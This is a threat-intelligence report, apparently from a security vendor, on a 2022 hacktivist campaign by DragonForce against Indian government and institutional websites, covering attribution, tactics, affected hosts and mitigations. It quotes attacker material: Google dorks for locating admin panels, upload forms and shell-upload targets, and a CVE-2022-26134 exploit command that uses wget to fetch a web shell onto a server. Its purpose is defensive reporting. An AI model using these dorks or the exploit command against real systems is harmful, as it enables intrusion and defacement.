- DragonForce has been actively targeting Indian entities under #OpsPatuk and #OpsIndia.
- Threat actor groups from Pakistan, Turkey, and Palestine have joined the campaign.
- Breach of some sensitive Government websites containing PII, military operations, and other government secrets.
- Implement Anti-DDoS technologies
- Utilize specially designed network equipment.
- Internet hosting providers and Government Cyber Response Teams to be on high alert.
Analysis & Attribution
Information from Social Media
- On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by the Malaysian hacktivist group, DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
- The group’s primary objective of the attack was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
- Since then, the group and its supporters have compromised more than 3,000 government and non-government organizations, military websites, and private entities.
- The compromised entities include BJP (the ruling party of India), Army veteran websites, academic institutes, etc.
About their Servers
- The group uses two DNS servers, “annabel.ns.cloudflare.com” and “nicolas.ns.cloudflare.com” with 220.127.116.11, and 18.104.22.168 being the IP addresses of the servers respectively.
- It was discovered that the DragonForce domain was hosted along with multiple Russian, Australian, Chinese, and other websites alongside multiple adult domains.
Techniques, Tactics, & Procedures (TTPs)
The three primary attack vectors used by the group and its supporters are as follows and as expressed in the flow diagram:
- Google Dorking
- Shodan Dorks
- DDoS Attacks
[caption id="attachment_20079" align="aligncenter" width="1931"]
Flow diagram illustrating an overview of the TTP employed by the DragonForce group and its partners[/caption]
- Google Dorks are the primary source of the group's targets, which is confirmed from the following image of a Tiktok video made by one of DragonForce's allies:
[caption id="attachment_20080" align="aligncenter" width="410"]
Image from a PoC video of a partner of DragonForce revealing Google Dorks in search[/caption]
- The Google Dorks list included dorks for finding various educational institutions, wherein dorks relating to academic and campus logins were found.
- The full list contains around 360 google dorks which could have been abused for numerous malicious purposes. A few significant dorks from the list are mentioned:
|inurl:/admin/upload/ : Ministry of Knowledge & Resource sharing
||inurl: /login/login.php admin: For Admin logins into websites using PHP language
|“allowed file types: png gif jpg txt site:gov.in” : Google dork to upload shell html files into the server
||php?id= site:in: Indian sites with ID parameter that can be abused and URL manipulation could be performed
|inurl/mnux = campus login : Academic institutions with Campus login parameter
||inurl/mnux = academic login : Academic institutions with Academic login parameter
|inurl/mnux = administrative academic login : Academic institutions with Administrative academic login parameter
||inurl: /admin/cp.php : Reveals all sites with Control panel which can provide access to the server.
|inurl:admin/upload.php : For sites with upload feature that actors could exploit for shell using script deface
Shodan Dorks and Atlassian Confluence Vulnerability
- A PoC was shared for the exploit of the Atlassian Confluence vulnerability along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
- The actor also shared a GitHub repository script which can be downloaded and exploited using the following python command:
|CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php
DDoS Attacks (HTTP Flooding)
- The group invited its members and other users on the forum to conduct the DDoS attack where they shared an infographic stating the website, IP addresses, and the port of the target.
[caption id="attachment_20081" align="aligncenter" width="815"]
Infographic shared by DragonForce group for OpsIndia/OpsPatuk[/caption]
- The group used a tool called HTTPFLOOD (aka “./404FOUND.MY”), which manipulates and posts unwanted requests to bring down a web server or application. The tool has been built in Python language and it takes the following three inputs:
- A target URL
- A Proxy list
- Number of threads (i.e count of requests to be sent to the server)
- Further analysis found that the user 'SKYSG404' built the HTTPFLOOD tool, and that both the tool and the Github account hosting it were created on 12 June 2022.
[caption id="attachment_20082" align="aligncenter" width="1920"]
Screenshot of the Github account hosting HTTPFLOOD(./404found.my)[/caption]
- It was observed that a large number of domains being targeted, resolved to a common IP where they were hosted.
- The attackers appeared to have gained access to the server via an injection vulnerability on one of the websites.
- Once a server is compromised, all the websites hosted on it easily fall prey to the attackers, as seen in the pie chart below.
[caption id="attachment_20083" align="aligncenter" width="809"]
Pie chart depicting common IP being shared by multiple Domain names[/caption]
- As witnessed in the table given below, almost 61% of the domains compromised belonged to E2ENetworks.in which is based in Delhi, India.
- Another major chunk, 20.8%, of hacked domains belonged to Atria Convergence Technologies Pvt. Ltd.
- Jointly, both of these ISPs constitute around 81% of the compromised websites.
Share of Domain names resolving to common IP and ISP Information
||Name of ISP
||Saidabad, New Delhi, India
||Saidabad, New Delhi, India
||Lucknow, Uttar Pradesh, India
||Atria Convergence Technologies pvt ltd
||Valsad, Gujarat, India
||Netmagic Datacenter Mumbai
Impact & Mitigation
- Escalation of such campaigns on a global level can lead to atrocious consequences for the Indian government and entities.
- Exposed data would equip malicious actors with details required to launch sophisticated attacks.
- Attacks on defense infrastructure can lead to sensitive information being compromised and cause a national security issue.
- Patch vulnerable and exploitable endpoints.
- Monitor for anomalies in user accounts and internet-exposed web applications, indicating possible account takeovers.
- Scan repositories to identify exposed credentials and secrets.
- Monitor cybercrime forums for the latest tactics employed by threat actors.
[caption id="attachment_20084" align="aligncenter" width="1366"]
Mumbai University’s website server was down in the aftermath of the DDOS attack[/caption]
[caption id="attachment_20085" align="aligncenter" width="1280"]
Infographic shared by DragonForce group for OpsIsrael/OpsBedil[/caption]
[caption id="attachment_20086" align="aligncenter" width="1326"]
annabel.ns.cloudflare.com DNS server with 2110 hosted domains.[/caption]
[caption id="attachment_20087" align="aligncenter" width="1207"]
nicolas.ns.cloudflare.com DNS server with 3909 hosted domains.[/caption]